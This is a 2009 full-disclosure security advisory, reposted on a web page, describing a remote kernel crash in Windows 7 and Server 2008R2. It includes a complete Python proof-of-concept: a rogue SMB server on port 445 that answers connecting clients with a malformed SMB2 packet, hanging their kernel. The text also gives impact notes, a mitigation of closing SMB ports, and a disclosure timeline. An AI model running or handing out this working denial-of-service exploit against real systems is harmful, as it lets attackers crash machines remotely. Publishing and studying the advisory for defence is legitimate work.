Windows 7 , Server 2008R2 Remote Kernel Crash

=============================================
– Release date: November 11th, 2009
– Discovered by: Laurent Gaffie
– Severity: Medium/High
=============================================

I. VULNERABILITY
————————-
Windows 7 * , Server 2008R2 Remote Kernel Crash

II. BACKGROUND
————————-
#FAIL,#FAIL,#FAIL
SDL FAIL, ‘Most Secure Os Ever’ –> Remote Kernel in 2 mn.
#FAIL,#FAIL,#FAIL

III. DESCRIPTION
————————-
See : http://g-laurent.blogspot.com/ for much more details

#Comment: This bug is specific Windows 7/2008R2.

IV. PROOF OF CONCEPT
————————-
[code]
#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast from the target: \this_script_ip_addr\BLAH , instantly crash
#Author: Laurent Gaffie
#

import SocketServer

packet = "\x00\x00\x00\x9a" # —> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"

class SMB2(SocketServer.BaseRequestHandler):

    def handle(self):

        print "Who:", self.client_address
        input = self.request.recv(1024)
        self.request.send(packet)
        self.request.close()

launch = SocketServer.TCPServer((”, 445),SMB2)# listen all interfaces port 445
launch.serve_forever()

#SDL FAILED
[/code]

V. BUSINESS IMPACT
————————-
An attacker can remotly crash any Windows 7/Server 2008R2.

VI. SYSTEMS AFFECTED
————————-
Windows 7, Windowns Server 2008R2

VII. SOLUTION
————————-
No patch available for the moment, your vendor do not care.
Close SMB feature and ports, until a real audit is provided.

VIII. REFERENCES
————————-
http://blogs.msdn.com/sdl/
http://g-laurent.blogspot.com/
http://twitter.com/g_laurent
IX. CREDITS
————————-
This vulnerability has been discovered by Laurent Gaffie
Laurent.gaffie{remove-this}(at)gmail.com

X. REVISION HISTORY
————————-
November 8th, 2009: MSRC contacted
November 8th, 2009: MSRC acknoledge the vuln
November 11th, 2009: MRSC try to convince me that multi-vendor-ipv6 bug
shouldn’t appears on a security bulletin.
November 11th, 2009: Win 7 remote kernel smash released

XI. LEGAL NOTICES
————————-
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

XII.Personal Notes
————————-
More Remote Kernel FD @MS to come.

___
Full-Disclosure – We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia – http://secunia.com/

답글 남기기

이메일 주소를 발행하지 않을 것입니다. 필수 항목은 *(으)로 표시합니다